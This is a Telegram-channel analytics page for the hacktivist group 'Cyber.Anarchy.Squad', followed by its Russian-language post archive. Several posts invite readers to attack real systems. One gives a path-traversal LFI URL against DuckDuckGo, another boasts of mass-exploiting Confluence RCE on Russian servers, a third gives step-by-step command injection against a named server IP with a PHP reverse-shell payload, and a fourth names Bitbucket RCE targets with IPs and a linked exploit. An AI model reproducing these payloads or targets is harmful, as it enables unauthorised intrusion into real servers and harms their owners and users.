en
Feedback
[ Cyber.Anarchy.Squad ]

[ Cyber.Anarchy.Squad ]

Open in Telegram

[ C.A.S Channels - @C_A_Ss ] [ Manager - @TheWayObserver3119 ] [ Warning: @caswarning ] [ Twitter: https://twitter.com/theway_3119 ]

Show more
Ukraine6 104The category is not specified

📈 Analytical overview of Telegram channel [ Cyber.Anarchy.Squad ]

Channel [ Cyber.Anarchy.Squad ] (@anarchy_squad) in the Russian language segment is an active participant. Currently, the community unites 11 047 subscribers, ranking in the Other category and 6 104 in the Ukraine region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 11 047 subscribers.

According to the latest data from 08 September, 2024, the channel demonstrates stable activity. Although there has been a change in the number of participants by 0 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 0%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 0 views. Within the first day, a publication typically gains 0 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 0.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
[ C.A.S Channels - @C_A_Ss ] [ Manager - @TheWayObserver3119 ] [ Warning: @caswarning ] [ Twitter: https://twitter.com/theway_3119 ]

Thanks to the high frequency of updates (latest data received on 09 September, 2024), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Other category.

11 047
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
Нас уже 2к, быстро время летит так то. Пока не знаю что сюда постить, поэтому краткое затишье. В ближайшее время попытаюсь организовать один коллаб, который длительное время не давал мне покоя. Сейчас и небо не спокойно, ракеты летают, а ночью каждый шум, заставляет тебя с нервозом придумывать его источник. Не будем о грустном, а вернёмся к тому что на руках. У властей РФ, есть один ресурс, где они своё показательное дрочево коллекционируют, именуя это "принятием законов", (ох уж эта демократия, и слова Мизулиной о том что "Право, это самая большая несвобода", которые буд-то из страниц Оруэлла скатаны.). Вот прям коллекция блять, хоть жопой жуй. Интересно, провернётся ли Жириновский в котле смоляном, когда мы всё удалим к хуям? А может и чего поинтересней) Не можно ничего обещать на перёд, каждый делает то что может, и на что времени хватает. Так что всему своё время, особенно внимательные, уже поняли к чему я клоню. Остальным - не парьтесь, время придёт и вы тоже поймёте. Надеюсь скоро свидимся, если ракетой не ёбнет)

А теперь минутка приколов, к которым жизнь вас точно не готовила. Достаём бурпы, и идём тыкаться туда, куда так-то и смотреть
А теперь минутка приколов, к которым жизнь вас точно не готовила. Достаём бурпы, и идём тыкаться туда, куда так-то и смотреть не стоит. (Вы сами отвечаете за свои действия, мы просто поделились *фичей) Активная LFI в поисковой системе Duck Duck Go, пост об уязвимости, можете глянуть выше в канале. [ Url: https://duckduckgo.com/?kad=../../../../../../../../../../usr/share/doc/openssh-client/faq

Вы тоже тестовый функционал как "webnavoz" именуете?) Думаю кормёжка там соответствующая)
Вы тоже тестовый функционал как "webnavoz" именуете?) Думаю кормёжка там соответствующая)

Ну и пару пиздовых треков, которые эта война породила: https://youtu.be/3UpoeJ2X07w https://youtu.be/0WPIeNKy38U

confluence_rce_by_cas.txt0.07 KB

#ConfluenceRceSploit

Случайно Ashoo усыпил, такое тоже иногда бывает https://ping-admin.com/free_test/result/1654687069l7j0563u3518o34105gwun.html

И так, канал пока на чиле, сканним таргеты и собираем вкусности) У нас уже есть (в некоторых случаях, даже были) доступы в госуху, и компании которые за работу госухи отвечают. Все же слышали о rce дырке в atlassion confluence?) Как только появился сплойт в паблике, я его допилил в сканер и автосплойтер. За 6-7 часов, было отобрано 45+ сайтов (а конфлюнс, джиру, и тд юзают в основном айти компании, и крупные промышленные компании), проверено на эксплуатабельность, и проведено преразведку, кому дырявые сервера принадлежат. В тот же день, этот "золотой расстрельный список" попал в руки сразу 3 человек, не имеющих прямого отношения к C.A.S, но работающих по РФ. Кто и что там просплойтил, я не знаю, но на след. день, множество сладких таргетов, были или отключены, или пропатчены. Сомневаюсь что им это уже поможет) Времени на их обработку, у меня банально не было. До сих пор кусаю губы, и злюсь что банально не закрепил коннекты в парочке из них) Однако, некоторые сервера до сих пор не пропатчены, а лист подаёт надежды на новые утечки и похецки) Если пост наберёт 20 лойсов, что для 1700+ подписоты, хуйня из рукава, я скину почищенный лист в канал (не всё то говнище, что хостится в РФии. Попадались даже украинские компании (неожиданно, да блять?)), и мой переписанный сплойт. А теперь к основной цели поста: Вчера лазил по цензису, и наткнулся на сервер ру компании vpsville (привязаный домен из сертификата, speedtest.vpsvillie.ru). Меня встретила уёбищная панель, которую юзают кажись, онли админы (вход с домена, на https порт, даёт 403). Учитывая, то что я нашёл на сервере (https://imgur.com/gdBLDZP.png), и название сабдомена, я понял что это закос под сервис недавно похецканой "уклы". Но блять, какой ебень в 2022 на проде, будет выгружать пхп скрипт с инпутом, в функцию shell_exec? Оказывается такие есть, и по их "допиздыважныхмнениях" безопасность преувеличена. Ладно, бывает же и такое. Мы имеем OS Injection, а это эстафета "кто первый кинул шелл, того и сервер". 1. Чтобы закинуть шелл, переходим по этому линку: [ http://185.220.32.91/ 2. И вставляем этот пейлод в инпут "Домен или айпи": [ ; php -r '$sock=fsockopen("LISTENER_IP",LISTENER_PORT);exec("/bin/sh -i <&3 >&3 2>&3");' # 3. Количество пакетов, без разницы, вы всё равно инжектите кмд. 4. Вводим капчу, и жмём Check. На сервере, куда будет кидаться реверс шелл, должен быть открыт соответствующий порт. Профит, делайте что хотите. Примечание: если вы не можете открыть веб сервер, значит кто-то закинул себе шелл, и он будет недоступен пока конект не сбросится со стороны юзера. Отсюда и нейм эстафеты)

Only channel creators can join a fed; please ask the creator to press this.

/joinfed 366f57e4-520b-4d0d-971d-96d91488b3b9

Only channel creators can join a fed; please ask the creator to press this.

I don't have permission to delete messages - please give me that permission before joining a fed.

/joinfed 366f57e4-520b-4d0d-971d-96d91488b3b9

Repost from [ C.A.S · FiLe$ ]

Вы знаете, что рекламу мы делаем редко, только в случае если контент считается прилично полезным и интересным, а взгляды администрации здравыми. Впрочем, хочется порекомендовать ИБ блог нашего партнёра, материал годный, и собственно актуальный. Ссылка: [ https://t.me/manual_pentesting ] #ВзаимоПоддержкаКонтента

photo content

photo content

RCE в Bitbacket репозиториях. [ Таргеты: pozitiv.digital и allsafe.hosting [ IPs: 194.15.58.22:443, 213.159.209.85:443 [ Exploit: https://github.com/Pear1y/CVE-2022-26133 P.S: В самом файле, есть пример как запустить reverse tcp shell, на свой листенер. Закодирован в base64, с этим разберётесь, ниже пример эксплуатации. P.S.2: Кто первый закрепился и обрезал доступ, того и сервер.

Есть вот у меня RCE и сплойтик, в 3 ресурса)... Стоит ли делиться с вами?

Если вы думаете что познали дзен DDoS'a, а сайт школы который на час был в ауте, это хакерская атака, то посмотрите это видео о знаменитейшем ботнете IoT устройств Mirai, и его авторах.